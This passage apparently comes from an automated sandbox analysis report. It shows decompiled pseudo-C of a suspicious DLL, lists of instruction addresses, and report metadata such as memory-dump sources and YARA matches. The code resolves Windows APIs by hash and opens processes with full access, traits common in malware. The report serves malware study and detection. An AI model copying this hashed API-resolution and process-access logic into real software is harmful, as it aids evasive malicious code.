                                                                                                                                                								if(_t228 > _t429) {
                                                                                                                                                									_t392 = 4 + _t412 * 4;
                                                                                                                                                									 *(_t439 + 0x6c) = _t392;
                                                                                                                                                									_t251 = E1000F4F0( *((intOrPtr*)(_t439 + 4)));
                                                                                                                                                									__eflags = _t251 -  *(_t439 + 0x6c);
                                                                                                                                                									if(_t251 >  *(_t439 + 0x6c)) {
                                                                                                                                                										 *((intOrPtr*)(_t439 + 0x90)) = E1000F4E0( *((intOrPtr*)(_t439 + 8)), _t429);
                                                                                                                                                										 *((intOrPtr*)(_t439 + 0x8c)) = E1000F4E0( *((intOrPtr*)(_t439 + 8)),  *(_t439 + 0x6c));
                                                                                                                                                										E100138C8( *((intOrPtr*)(_t439 + 0x98)),  *((intOrPtr*)(_t439 + 0x90)), E1000F4F0( *((intOrPtr*)(_t439 + 4))) -  *(_t439 + 0x6c));
                                                                                                                                                										_t439 = _t439 + 0xc;
                                                                                                                                                									}
                                                                                                                                                									E1000F84C( *((intOrPtr*)(_t439 + 8)), E1000F4F0( *((intOrPtr*)(_t439 + 4))) + 0xfffffffc);
                                                                                                                                                									_t74 =  &(_t308[7]);
                                                                                                                                                									 *_t74 = _t308[7] - 1;
                                                                                                                                                									__eflags =  *_t74;
                                                                                                                                                								}
                                                                                                                                                								_t229 = E1000F4F0( *_t439);
                                                                                                                                                								__eflags = _t229 - _t429;
                                                                                                                                                								if(_t229 > _t429) {
                                                                                                                                                									_t413 = 4 + _t412 * 4;
                                                                                                                                                									_t242 = E1000F4F0( *_t439);
                                                                                                                                                									__eflags = _t242 - _t413;
                                                                                                                                                									if(_t242 > _t413) {
                                                                                                                                                										_t243 = E1000F4E0( *((intOrPtr*)(_t439 + 4)), _t429);
                                                                                                                                                										 *((intOrPtr*)(_t439 + 0x94)) = E1000F4E0( *((intOrPtr*)(_t439 + 4)), _t413);
                                                                                                                                                										E100138C8(_t243,  *((intOrPtr*)(_t439 + 0x98)), E1000F4F0( *_t439) - _t413);
                                                                                                                                                										_t439 = _t439 + 0xc;
                                                                                                                                                									}
                                                                                                                                                									E1000F84C( *((intOrPtr*)(_t439 + 4)), E1000F4F0( *_t439) + 0xfffffffc);
                                                                                                                                                									_t79 =  &(_t308[1]);
                                                                                                                                                									 *_t79 = _t308[1] - 1;
                                                                                                                                                									__eflags =  *_t79;
                                                                                                                                                								}
                                                                                                                                                								E1000F84C( *((intOrPtr*)(_t439 + 8)), E1000F4F0( *((intOrPtr*)(_t439 + 4))) + 4);
                                                                                                                                                								 *(E1000F4E0( *((intOrPtr*)(_t439 + 8)), E1000F4F0( *((intOrPtr*)(_t439 + 4))) + 0xfffffffc)) = _t308[0xc];
                                                                                                                                                								_t308[7] = _t308[7] + 1;
                                                                                                                                                								E1000F84C( *((intOrPtr*)(_t439 + 4)), E1000F4F0( *_t439) + 4);
                                                                                                                                                								 *(E1000F4E0( *((intOrPtr*)(_t439 + 4)), E1000F4F0( *_t439) + 0xfffffffc)) = _t308[0xd];
                                                                                                                                                								_t308[1] = _t308[1] + 1;
                                                                                                                                                							}
                                                                                                                                                							goto L46;
                                                                                                                                                						}
                                                                                                                                                						_t433 = 0;
                                                                                                                                                						__eflags = 0;
                                                                                                                                                						do {
                                                                                                                                                							 *(_t439 + 0x70) = _t433 * 4;
                                                                                                                                                							_t403 = E1000F4E0(_t439 + 0x28, _t433 * 4);
                                                                                                                                                							_t392 = _t308[1];
                                                                                                                                                							 *(_t439 + 0x80) = _t392;
                                                                                                                                                							__eflags = _t392;
                                                                                                                                                							if(_t392 <= 0) {
                                                                                                                                                								L29:
                                                                                                                                                								_t414 = E1001303C(0x10154545, 0xc2a75cb8);
                                                                                                                                                								__eflags = _t414;
                                                                                                                                                								if(_t414 != 0) {
                                                                                                                                                									_t416 =  *_t414(0x1fffff, 0,  *((intOrPtr*)(E1000F4E0(_t439 + 0x28,  *(_t439 + 0x70)))));
                                                                                                                                                									__eflags = _t416;
                                                                                                                                                									if(_t416 != 0) {
                                                                                                                                                										E1000F84C( *((intOrPtr*)(_t439 + 8)), E1000F4F0( *((intOrPtr*)(_t439 + 4))) + 4);
                                                                                                                                                										 *(E1000F4E0( *((intOrPtr*)(_t439 + 8)), E1000F4F0( *((intOrPtr*)(_t439 + 4))) + 0xfffffffc)) = _t416;
                                                                                                                                                										_t308[7] = _t308[7] + 1;
                                                                                                                                                										_t271 = E1000F4E0(_t439 + 0x28,  *(_t439 + 0x70));
                                                                                                                                                										E1000F84C( *((intOrPtr*)(_t439 + 4)), E1000F4F0( *_t439) + 4);
                                                                                                                                                										 *(E1000F4E0( *((intOrPtr*)(_t439 + 4)), E1000F4F0( *_t439) + 0xfffffffc)) =  *_t271;
                                                                                                                                                										_t57 =  &(_t308[1]);
                                                                                                                                                										 *_t57 = _t308[1] + 1;
                                                                                                                                                										__eflags =  *_t57;
                                                                                                                                                									}
                                                                                                                                                								}
                                                                                                                                                								goto L32;
                                                                                                                                                							}
                                                                                                                                                							_t415 = 0;
                                                                                                                                                							__eflags = 0;
                                                                                                                                                							while(1) {
                                                                                                                                                								_t392 =  *(E1000F4E0( *((intOrPtr*)(_t439 + 4)), _t415 * 4));
                                                                                                                                                								__eflags = _t392 -  *_t403;
                                                                                                                                                								if(_t392 ==  *_t403) {
                                                                                                                                                									break;
                                                                                                                                                								}
                                                                                                                                                								_t415 = _t415 + 1;
                                                                                                                                                								__eflags = _t415 -  *(_t439 + 0x80);
                                                                                                                                                								if(_t415 <  *(_t439 + 0x80)) {
                                                                                                                                                									continue;
                                                                                                                                                								}
                                                                                                                                                								goto L29;
                                                                                                                                                							}
                                                                                                                                                							__eflags = _t415 - 0xffffffff;
                                                                                                                                                							if(_t415 == 0xffffffff) {
                                                                                                                                                								goto L29;
                                                                                                                                                							}
                                                                                                                                                							L32:
                                                                                                                                                							_t433 = _t433 + 1;
                                                                                                                                                							__eflags = _t433 -  *(_t439 + 0x20);
                                                                                                                                                						} while (_t433 <  *(_t439 + 0x20));
                                                                                                                                                						goto L33;
                                                                                                                                                					} else {
                                                                                                                                                						_t434 = 0;
                                                                                                                                                						__eflags = 0;
                                                                                                                                                						do {
                                                                                                                                                							 *(_t439 + 0x64) = _t434 * 4;
                                                                                                                                                							_t404 = E1000F4E0( *((intOrPtr*)(_t439 + 4)), _t434 * 4);
                                                                                                                                                							_t392 =  *(_t439 + 0x20);
                                                                                                                                                							 *(_t439 + 0x7c) = _t392;
                                                                                                                                                							__eflags = _t392;
                                                                                                                                                							if(_t392 <= 0) {
                                                                                                                                                								L11:
                                                                                                                                                								_t282 = E1000F4F0( *_t439);
                                                                                                                                                								__eflags = _t282 -  *(_t439 + 0x64);
                                                                                                                                                								if(_t282 >  *(_t439 + 0x64)) {
                                                                                                                                                									_t420 = 4 + _t434 * 4;
                                                                                                                                                									_t296 = E1000F4F0( *_t439);
                                                                                                                                                									__eflags = _t296 - _t420;
                                                                                                                                                									if(_t296 > _t420) {
                                                                                                                                                										 *((intOrPtr*)(_t439 + 0x9c)) = E1000F4E0( *((intOrPtr*)(_t439 + 4)),  *(_t439 + 0x64));
                                                                                                                                                										 *((intOrPtr*)(_t439 + 0x98)) = E1000F4E0( *((intOrPtr*)(_t439 + 4)), _t420);
                                                                                                                                                										E100138C8( *((intOrPtr*)(_t439 + 0xa4)),  *((intOrPtr*)(_t439 + 0x9c)), E1000F4F0( *_t439) - _t420);
                                                                                                                                                										_t439 = _t439 + 0xc;
                                                                                                                                                									}
                                                                                                                                                									E1000F84C( *((intOrPtr*)(_t439 + 4)), E1000F4F0( *_t439) + 0xfffffffc);
                                                                                                                                                									_t22 =  &(_t308[1]);
                                                                                                                                                									 *_t22 = _t308[1] - 1;
                                                                                                                                                									__eflags =  *_t22;
                                                                                                                                                								}
                                                                                                                                                								_t419 = E1001303C(0xfe338407, 0x77fa1d17);
                                                                                                                                                								__eflags = _t419;
                                                                                                                                                								if(_t419 != 0) {
                                                                                                                                                									 *_t419( *((intOrPtr*)(E1000F4E0( *((intOrPtr*)(_t439 + 8)),  *(_t439 + 0x64)))));
                                                                                                                                                								}
                                                                                                                                                								_t284 = E1000F4F0( *((intOrPtr*)(_t439 + 4)));
                                                                                                                                                								__eflags = _t284 -  *(_t439 + 0x64);
                                                                                                                                                								if(_t284 >  *(_t439 + 0x64)) {
                                                                                                                                                									_t422 = 4 + _t434 * 4;
                                                                                                                                                									_t285 = E1000F4F0( *((intOrPtr*)(_t439 + 4)));
                                                                                                                                                									__eflags = _t285 - _t422;
                                                                                                                                                									if(_t285 > _t422) {
                                                                                                                                                										 *((intOrPtr*)(_t439 + 0xa4)) = E1000F4E0( *((intOrPtr*)(_t439 + 8)),  *(_t439 + 0x64));
                                                                                                                                                										 *((intOrPtr*)(_t439 + 0xa0)) = E1000F4E0( *((intOrPtr*)(_t439 + 8)), _t422);
                                                                                                                                                										E100138C8( *((intOrPtr*)(_t439 + 0xac)),  *((intOrPtr*)(_t439 + 0xa4)), E1000F4F0( *((intOrPtr*)(_t439 + 4))) - _t422);
                                                                                                                                                										_t439 = _t439 + 0xc;
                                                                                                                                                									}
                                                                                                                                                									E1000F84C( *((intOrPtr*)(_t439 + 8)), E1000F4F0( *((intOrPtr*)(_t439 + 4))) + 0xfffffffc);
                                                                                                                                                									_t33 =  &(_t308[7]);
                                                                                                                                                									 *_t33 = _t308[7] - 1;
                                                                                                                                                									__eflags =  *_t33;
                                                                                                                                                								}
                                                                                                                                                								_t434 = _t434 - 1;
                                                                                                                                                								__eflags = _t434;
                                                                                                                                                								goto L20;
                                                                                                                                                							}
                                                                                                                                                							_t421 = 0;
                                                                                                                                                							__eflags = 0;
                                                                                                                                                							while(1) {
                                                                                                                                                								_t392 =  *(E1000F4E0(_t439 + 0x28, _t421 * 4));
                                                                                                                                                								__eflags = _t392 -  *_t404;
                                                                                                                                                								if(_t392 ==  *_t404) {
                                                                                                                                                									break;
                                                                                                                                                								}
                                                                                                                                                								_t421 = _t421 + 1;
                                                                                                                                                								__eflags = _t421 -  *(_t439 + 0x7c);
                                                                                                                                                								if(_t421 <  *(_t439 + 0x7c)) {
                                                                                                                                                									continue;
                                                                                                                                                								}
                                                                                                                                                								goto L11;
                                                                                                                                                							}
                                                                                                                                                							__eflags = _t421 - 0xffffffff;
                                                                                                                                                							if(_t421 == 0xffffffff) {
                                                                                                                                                								goto L11;
                                                                                                                                                							}
                                                                                                                                                							L20:
                                                                                                                                                							_t434 = _t434 + 1;
                                                                                                                                                							__eflags = _t434 - _t308[1];
                                                                                                                                                						} while (_t434 < _t308[1]);
                                                                                                                                                						goto L21;
                                                                                                                                                					}
                                                                                                                                                				}
                                                                                                                                                			}













































                                                                                                                                                0x1000a536
                                                                                                                                                0x1000a538
                                                                                                                                                0x1000a543
                                                                                                                                                0x1000a549
                                                                                                                                                0x1000a54d
                                                                                                                                                0x1000a552
                                                                                                                                                0x1000a558
                                                                                                                                                0x1000a568
                                                                                                                                                0x00000000
                                                                                                                                                0x1000a56a
                                                                                                                                                0x1000a56a
                                                                                                                                                0x1000a575
                                                                                                                                                0x1000a575
                                                                                                                                                0x1000aaf3
                                                                                                                                                0x1000aaf5
                                                                                                                                                0x1000aaf6
                                                                                                                                                0x1000ab35
                                                                                                                                                0x1000ab39
                                                                                                                                                0x1000ab47
                                                                                                                                                0x1000ab55
                                                                                                                                                0x1000ab55
                                                                                                                                                0x1000ab40
                                                                                                                                                0x1000ab5b
                                                                                                                                                0x1000ab60
                                                                                                                                                0x00000000
                                                                                                                                                0x1000ab60
                                                                                                                                                0x1000ab44
                                                                                                                                                0x1000ab45
                                                                                                                                                0x00000000
                                                                                                                                                0x1000a57f
                                                                                                                                                0x1000a57f
                                                                                                                                                0x1000a583
                                                                                                                                                0x1000a68a
                                                                                                                                                0x1000a68a
                                                                                                                                                0x1000a68f
                                                                                                                                                0x1000a7a0
                                                                                                                                                0x1000a7a4
                                                                                                                                                0x1000a7a9
                                                                                                                                                0x1000a7ad
                                                                                                                                                0x1000a8d7
                                                                                                                                                0x1000a8d9
                                                                                                                                                0x1000a8dd
                                                                                                                                                0x1000a8e6
                                                                                                                                                0x1000a8ef
                                                                                                                                                0x1000a8f3
                                                                                                                                                0x1000a8fc
                                                                                                                                                0x1000a903
                                                                                                                                                0x1000a904
                                                                                                                                                0x1000a908
                                                                                                                                                0x1000a90c
                                                                                                                                                0x1000a910
                                                                                                                                                0x1000a912
                                                                                                                                                0x1000aa7c
                                                                                                                                                0x1000aa7c
                                                                                                                                                0x1000aa84
                                                                                                                                                0x1000aa9c
                                                                                                                                                0x1000aa9e
                                                                                                                                                0x1000aaa0
                                                                                                                                                0x1000aada
                                                                                                                                                0x1000aada
                                                                                                                                                0x1000aadc
                                                                                                                                                0x1000aadc
                                                                                                                                                0x1000aadf
                                                                                                                                                0x1000aafa
                                                                                                                                                0x1000ab0e
                                                                                                                                                0x1000ab11
                                                                                                                                                0x1000ab16
                                                                                                                                                0x1000ab21
                                                                                                                                                0x1000ab22
                                                                                                                                                0x1000ab25
                                                                                                                                                0x1000ab27
                                                                                                                                                0x1000ab30
                                                                                                                                                0x00000000
                                                                                                                                                0x1000ab30
                                                                                                                                                0x1000aae1
                                                                                                                                                0x1000aae5
                                                                                                                                                0x1000aaee
                                                                                                                                                0x00000000
                                                                                                                                                0x1000aaee
                                                                                                                                                0x1000aab1
                                                                                                                                                0x1000aac1
                                                                                                                                                0x1000aac5
                                                                                                                                                0x1000aac5
                                                                                                                                                0x1000aac8
                                                                                                                                                0x1000aacb
                                                                                                                                                0x1000aace
                                                                                                                                                0x1000aad4
                                                                                                                                                0x00000000
                                                                                                                                                0x00000000
                                                                                                                                                0x00000000
                                                                                                                                                0x1000aad6
                                                                                                                                                0x1000a91a
                                                                                                                                                0x1000a91a
                                                                                                                                                0x1000a91c
                                                                                                                                                0x1000a920
                                                                                                                                                0x1000a925
                                                                                                                                                0x1000a927
                                                                                                                                                0x1000a92b
                                                                                                                                                0x1000a92e
                                                                                                                                                0x1000a936
                                                                                                                                                0x1000a938
                                                                                                                                                0x00000000
                                                                                                                                                0x00000000
                                                                                                                                                0x1000a94f
                                                                                                                                                0x1000a96a
                                                                                                                                                0x1000a96c
                                                                                                                                                0x1000a97f
                                                                                                                                                0x1000a981
                                                                                                                                                0x1000a983
                                                                                                                                                0x1000a99e
                                                                                                                                                0x1000a99e
                                                                                                                                                0x1000a9a2
                                                                                                                                                0x1000a9a4
                                                                                                                                                0x00000000
                                                                                                                                                0x00000000
                                                                                                                                                0x1000a9a6
                                                                                                                                                0x1000a9a9
                                                                                                                                                0x1000a9ca
                                                                                                                                                0x1000a9e9
                                                                                                                                                0x1000a9ef
                                                                                                                                                0x1000a9f2
                                                                                                                                                0x1000a9f7
                                                                                                                                                0x1000a9f8
                                                                                                                                                0x1000a9fc
                                                                                                                                                0x00000000
                                                                                                                                                0x00000000
                                                                                                                                                0x1000aa04
                                                                                                                                                0x1000aa04
                                                                                                                                                0x1000aa06
                                                                                                                                                0x1000aa12
                                                                                                                                                0x1000aa1e
                                                                                                                                                0x1000aa28
                                                                                                                                                0x1000aa2b
                                                                                                                                                0x1000aa2e
                                                                                                                                                0x1000aa32
                                                                                                                                                0x1000aa39
                                                                                                                                                0x1000aa3d
                                                                                                                                                0x1000aa41
                                                                                                                                                0x1000aa42
                                                                                                                                                0x1000aa46
                                                                                                                                                0x1000aa4b
                                                                                                                                                0x1000aa50
                                                                                                                                                0x1000aa54
                                                                                                                                                0x1000aa58
                                                                                                                                                0x1000aa5e
                                                                                                                                                0x1000aa64
                                                                                                                                                0x1000aa6a
                                                                                                                                                0x1000aa70
                                                                                                                                                0x1000aa75
                                                                                                                                                0x1000aa76
                                                                                                                                                0x1000aa76
                                                                                                                                                0x00000000
                                                                                                                                                0x1000aa06
                                                                                                                                                0x00000000
                                                                                                                                                0x1000a9a9
                                                                                                                                                0x1000a987
                                                                                                                                                0x1000a998
                                                                                                                                                0x1000a99a
                                                                                                                                                0x1000a99c
                                                                                                                                                0x00000000
                                                                                                                                                0x00000000
                                                                                                                                                0x00000000
                                                                                                                                                0x1000a99c
                                                                                                                                                0x1000a9af
                                                                                                                                                0x00000000
                                                                                                                                                0x1000a9af
                                                                                                                                                0x1000a7b3
                                                                                                                                                0x1000a7b6
                                                                                                                                                0x1000a7b8
                                                                                                                                                0x00000000
                                                                                                                                                0x00000000
                                                                                                                                                0x1000a7c0
                                                                                                                                                0x1000a7c0
                                                                                                                                                0x1000a7c2
                                                                                                                                                0x1000a7c2
                                                                                                                                                0x1000a7d3
                                                                                                                                                0x1000a7d5
                                                                                                                                                0x1000a7d8
                                                                                                                                                0x00000000
                                                                                                                                                0x00000000
                                                                                                                                                0x1000a8ce
                                                                                                                                                0x1000a8cf
                                                                                                                                                0x1000a8d1
                                                                                                                                                0x00000000
                                                                                                                                                0x00000000
                                                                                                                                                0x00000000
                                                                                                                                                0x1000a8d1
                                                                                                                                                0x1000a7de
                                                                                                                                                0x1000a7e1
                                                                                                                                                0x1000a7eb
                                                                                                                                                0x1000a7f0
                                                                                                                                                0x1000a7f2
                                                                                                                                                0x1000a7f8
                                                                                                                                                0x1000a7ff
                                                                                                                                                0x1000a803
                                                                                                                                                0x1000a808
                                                                                                                                                0x1000a80c
                                                                                                                                                0x1000ac47
                                                                                                                                                0x1000ac5b
                                                                                                                                                0x1000ac7e
                                                                                                                                                0x1000ac83
                                                                                                                                                0x1000ac83
                                                                                                                                                0x1000a823
                                                                                                                                                0x1000a828
                                                                                                                                                0x1000a828
                                                                                                                                                0x1000a828
                                                                                                                                                0x1000a828
                                                                                                                                                0x1000a82e
                                                                                                                                                0x1000a833
                                                                                                                                                0x1000a835
                                                                                                                                                0x1000a83a
                                                                                                                                                0x1000a841
                                                                                                                                                0x1000a846
                                                                                                                                                0x1000a848
                                                                                                                                                0x1000ac05
                                                                                                                                                0x1000ac16
                                                                                                                                                0x1000ac30
                                                                                                                                                0x1000ac35
                                                                                                                                                0x1000ac35
                                                                                                                                                0x1000a85e
                                                                                                                                                0x1000a863
                                                                                                                                                0x1000a863
                                                                                                                                                0x1000a863
                                                                                                                                                0x1000a863
                                                                                                                                                0x1000a877
                                                                                                                                                0x1000a895
                                                                                                                                                0x1000a89a
                                                                                                                                                0x1000a8aa
                                                                                                                                                0x1000a8c7
                                                                                                                                                0x1000a8c9
                                                                                                                                                0x1000a8c9
                                                                                                                                                0x00000000
                                                                                                                                                0x1000a7e1
                                                                                                                                                0x1000a697
                                                                                                                                                0x1000a697
                                                                                                                                                0x1000a699
                                                                                                                                                0x1000a6a0
                                                                                                                                                0x1000a6ae
                                                                                                                                                0x1000a6b0
                                                                                                                                                0x1000a6b3
                                                                                                                                                0x1000a6ba
                                                                                                                                                0x1000a6bc
                                                                                                                                                0x1000a6ed
                                                                                                                                                0x1000a6fc
                                                                                                                                                0x1000a6fe
                                                                                                                                                0x1000a700
                                                                                                                                                0x1000a71e
                                                                                                                                                0x1000a720
                                                                                                                                                0x1000a722
                                                                                                                                                0x1000a735
                                                                                                                                                0x1000a754
                                                                                                                                                0x1000a75a
                                                                                                                                                0x1000a75d
                                                                                                                                                0x1000a774
                                                                                                                                                0x1000a790
                                                                                                                                                0x1000a792
                                                                                                                                                0x1000a792
                                                                                                                                                0x1000a792
                                                                                                                                                0x1000a792
                                                                                                                                                0x1000a722
                                                                                                                                                0x00000000
                                                                                                                                                0x1000a700
                                                                                                                                                0x1000a6c0
                                                                                                                                                0x1000a6c0
                                                                                                                                                0x1000a6c2
                                                                                                                                                0x1000a6d3
                                                                                                                                                0x1000a6d5
                                                                                                                                                0x1000a6d7
                                                                                                                                                0x00000000
                                                                                                                                                0x00000000
                                                                                                                                                0x1000a6e3
                                                                                                                                                0x1000a6e4
                                                                                                                                                0x1000a6eb
                                                                                                                                                0x00000000
                                                                                                                                                0x00000000
                                                                                                                                                0x00000000
                                                                                                                                                0x1000a6eb
                                                                                                                                                0x1000a6d9
                                                                                                                                                0x1000a6dc
                                                                                                                                                0x00000000
                                                                                                                                                0x00000000
                                                                                                                                                0x1000a795
                                                                                                                                                0x1000a795
                                                                                                                                                0x1000a796
                                                                                                                                                0x1000a796
                                                                                                                                                0x00000000
                                                                                                                                                0x1000a589
                                                                                                                                                0x1000a58b
                                                                                                                                                0x1000a58b
                                                                                                                                                0x1000a58d
                                                                                                                                                0x1000a594
                                                                                                                                                0x1000a5a2
                                                                                                                                                0x1000a5a4
                                                                                                                                                0x1000a5a8
                                                                                                                                                0x1000a5ac
                                                                                                                                                0x1000a5ae
                                                                                                                                                0x1000a5dc
                                                                                                                                                0x1000a5df
                                                                                                                                                0x1000a5e4
                                                                                                                                                0x1000a5e8
                                                                                                                                                0x1000a5ed
                                                                                                                                                0x1000a5f4
                                                                                                                                                0x1000a5f9
                                                                                                                                                0x1000a5fb
                                                                                                                                                0x1000abc2
                                                                                                                                                0x1000abd3
                                                                                                                                                0x1000abf3
                                                                                                                                                0x1000abf8
                                                                                                                                                0x1000abf8
                                                                                                                                                0x1000a611
                                                                                                                                                0x1000a616
                                                                                                                                                0x1000a616
                                                                                                                                                0x1000a616
                                                                                                                                                0x1000a616
                                                                                                                                                0x1000a628
                                                                                                                                                0x1000a62a
                                                                                                                                                0x1000a62c
                                                                                                                                                0x1000a63d
                                                                                                                                                0x1000a63d
                                                                                                                                                0x1000a643
                                                                                                                                                0x1000a648
                                                                                                                                                0x1000a64c
                                                                                                                                                0x1000a652
                                                                                                                                                0x1000a659
                                                                                                                                                0x1000a65e
                                                                                                                                                0x1000a660
                                                                                                                                                0x1000ab76
                                                                                                                                                0x1000ab87
                                                                                                                                                0x1000aba8
                                                                                                                                                0x1000abad
                                                                                                                                                0x1000abad
                                                                                                                                                0x1000a677
                                                                                                                                                0x1000a67c
                                                                                                                                                0x1000a67c
                                                                                                                                                0x1000a67c
                                                                                                                                                0x1000a67c
                                                                                                                                                0x1000a67f
                                                                                                                                                0x1000a67f
                                                                                                                                                0x00000000
                                                                                                                                                0x1000a67f
                                                                                                                                                0x1000a5b2
                                                                                                                                                0x1000a5b2
                                                                                                                                                0x1000a5b4
                                                                                                                                                0x1000a5c5
                                                                                                                                                0x1000a5c7
                                                                                                                                                0x1000a5c9
                                                                                                                                                0x00000000
                                                                                                                                                0x00000000
                                                                                                                                                0x1000a5d5
                                                                                                                                                0x1000a5d6
                                                                                                                                                0x1000a5da
                                                                                                                                                0x00000000
                                                                                                                                                0x00000000
                                                                                                                                                0x00000000
                                                                                                                                                0x1000a5da
                                                                                                                                                0x1000a5cb
                                                                                                                                                0x1000a5ce
                                                                                                                                                0x00000000
                                                                                                                                                0x00000000
                                                                                                                                                0x1000a680
                                                                                                                                                0x1000a680
                                                                                                                                                0x1000a681
                                                                                                                                                0x1000a681
                                                                                                                                                0x00000000
                                                                                                                                                0x1000a58d
                                                                                                                                                0x1000a583

                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000003.00000002.319669645.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                • Associated: 00000003.00000002.319665498.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000003.00000002.319682425.000000001001A000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000003.00000002.319687174.000000001001D000.00000004.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000003.00000002.319691145.000000001001F000.00000002.00020000.sdmp Download File
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 0-3916222277
                                                                                                                                                • Opcode ID: 36e75452c6386778a6513a02999b7e65d42d9e31c513e5d7e5861bcc0e0d1e34
                                                                                                                                                • Instruction ID: 00802be3918ea6aeb11fe45908ae931f8062d9273d37329102aa76dba10a21a3
                                                                                                                                                • Opcode Fuzzy Hash: 36e75452c6386778a6513a02999b7e65d42d9e31c513e5d7e5861bcc0e0d1e34
                                                                                                                                                • Instruction Fuzzy Hash: 60128C755082019FE714DF24C882A6FB7E5FFC5394F108A2DF899972AADB30AC45DB42
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                C-Code - Quality: 93%
                                                                                                                                                			E1000846C(signed int* __ecx, intOrPtr __edx, void* __eflags) {
                                                                                                                                                				void* __esi;
                                                                                                                                                				void* __ebp;
                                                                                                                                                				signed int* _t173;
                                                                                                                                                				signed int* _t178;
                                                                                                                                                				void* _t180;
                                                                                                                                                				void* _t181;
                                                                                                                                                				intOrPtr* _t188;
                                                                                                                                                				signed int _t202;
                                                                                                                                                				intOrPtr* _t211;
                                                                                                                                                				intOrPtr* _t212;
                                                                                                                                                				intOrPtr* _t217;
                                                                                                                                                				signed int* _t218;
                                                                                                                                                				void* _t219;
                                                                                                                                                				void* _t220;
                                                                                                                                                				void* _t237;
                                                                                                                                                				void* _t238;
                                                                                                                                                				signed int* _t246;
                                                                                                                                                				void* _t247;
                                                                                                                                                				signed int* _t258;
                                                                                                                                                				intOrPtr* _t269;
                                                                                                                                                				signed int* _t277;
                                                                                                                                                				intOrPtr* _t279;
                                                                                                                                                				void* _t283;
                                                                                                                                                				void* _t285;
                                                                                                                                                				void* _t287;
                                                                                                                                                				signed int* _t296;
                                                                                                                                                				void* _t299;
                                                                                                                                                				signed int* _t308;
                                                                                                                                                				intOrPtr* _t310;
                                                                                                                                                				signed int _t315;
                                                                                                                                                				intOrPtr _t317;
                                                                                                                                                				signed int* _t322;
                                                                                                                                                				signed int _t323;
                                                                                                                                                				signed int _t324;
                                                                                                                                                				void* _t343;
                                                                                                                                                				void* _t414;
                                                                                                                                                				signed int _t415;
                                                                                                                                                				signed int* _t421;
                                                                                                                                                				signed int _t427;
                                                                                                                                                				intOrPtr* _t428;
                                                                                                                                                				intOrPtr* _t429;
                                                                                                                                                				signed int _t431;
                                                                                                                                                				signed int _t433;
                                                                                                                                                				signed int _t437;
                                                                                                                                                				signed int _t438;
                                                                                                                                                				signed int _t439;
                                                                                                                                                				signed int _t442;
                                                                                                                                                				void* _t443;
                                                                                                                                                				signed int _t444;
                                                                                                                                                				void* _t445;
                                                                                                                                                				signed int _t446;
                                                                                                                                                				intOrPtr* _t449;
                                                                                                                                                
                                                                                                                                                				 *_t449 = __ecx + 0x1c;
                                                                                                                                                				 *((intOrPtr*)(_t449 + 0x68)) = __edx;
                                                                                                                                                				 *(_t449 + 4) = __ecx;
                                                                                                                                                				 *(_t449 + 0x84) = 0;
                                                                                                                                                				 *((intOrPtr*)(_t449 + 0x78)) = __ecx + 4;
                                                                                                                                                				while(1) {
                                                                                                                                                					_t413 =  *(_t449 + 0x6c);
                                                                                                                                                					E1000B69C(_t449 + 0x24,  *(_t449 + 0x6c), 0x7fffffff);
                                                                                                                                                					if(E1000F4F4(_t449 + 0x24) == 0) {
                                                                                                                                                						goto L3;
                                                                                                                                                					} else {
                                                                                                                                                						( *(_t449 + 4))[0xb] = 0;
                                                                                                                                                						E1000F678(_t449 + 0x24);
                                                                                                                                                					}
                                                                                                                                                					L60:
                                                                                                                                                					_t317 = 0xffffffffffffffff;
                                                                                                                                                					L62:
                                                                                                                                                					if(_t317 != 0) {
                                                                                                                                                						L65:
                                                                                                                                                						return _t317;
                                                                                                                                                					}
                                                                                                                                                					if( *(_t449 + 0x84) != 0x20) {
                                                                                                                                                						E1001223C(0x5dc, _t413, _t430);
                                                                                                                                                						 *(_t449 + 0x84) =  *(_t449 + 0x84) + 1;
                                                                                                                                                						continue;
                                                                                                                                                					}
                                                                                                                                                					_t317 = 0xffffffffffffffff;
                                                                                                                                                					goto L65;
                                                                                                                                                					L3:
                                                                                                                                                					__eflags =  *( *(_t449 + 4));
                                                                                                                                                					if( *( *(_t449 + 4)) <= 0) {
                                                                                                                                                						L21:
                                                                                                                                                						__eflags =  *(_t449 + 0x20);
                                                                                                                                                						if( *(_t449 + 0x20) <= 0) {
                                                                                                                                                							L33:
                                                                                                                                                							E1000F678(_t449 + 0x24);
                                                                                                                                                							_t173 =  *(_t449 + 4);
                                                                                                                                                							__eflags = _t173[0xb];
                                                                                                                                                							if(_t173[0xb] == 0) {
                                                                                                                                                								L46:
                                                                                                                                                								 *((intOrPtr*)(_t449 + 8)) = 0;
                                                                                                                                                								 *((intOrPtr*)(_t449 + 0xc)) = 0;
                                                                                                                                                								E1000F5A8(_t449 + 0x14, 0);
                                                                                                                                                								 *((intOrPtr*)(_t449 + 0x34)) =  *((intOrPtr*)(_t449 + 0x68));
                                                                                                                                                								 *((intOrPtr*)(_t449 + 0x38)) = 0;
                                                                                                                                                								E1000F5A8(_t449 + 0x40, 0);
                                                                                                                                                								_t178 =  *(_t449 + 4);
                                                                                                                                                								_t414 = 0x40;
                                                                                                                                                								__eflags = _t178[6] - 0x40;
                                                                                                                                                								_t415 =  <  ? _t178[6] : _t414;
                                                                                                                                                								 *(_t449 + 0x80) = _t415;
                                                                                                                                                								__eflags = _t415;
                                                                                                                                                								if(_t415 <= 0) {
                                                                                                                                                									L57:
                                                                                                                                                									_t413 = E1000F4E0(_t449 + 0x14, 0);
                                                                                                                                                									_t180 = E10012928( *((intOrPtr*)(_t449 + 0xc)), _t179, 0x3e8);
                                                                                                                                                									_t132 = _t180 - 0x80; // -128
                                                                                                                                                									_t181 = _t132;
                                                                                                                                                									__eflags = _t181 - 0x3f;
                                                                                                                                                									_t315 =  <=  ? _t181 : _t180;
                                                                                                                                                									__eflags = _t315 - 0x102;
                                                                                                                                                									if(_t315 == 0x102) {
                                                                                                                                                										L59:
                                                                                                                                                										E1000B608(_t449 + 0x34);
                                                                                                                                                										E1000B608(_t449 + 8);
                                                                                                                                                										goto L60;
                                                                                                                                                									}
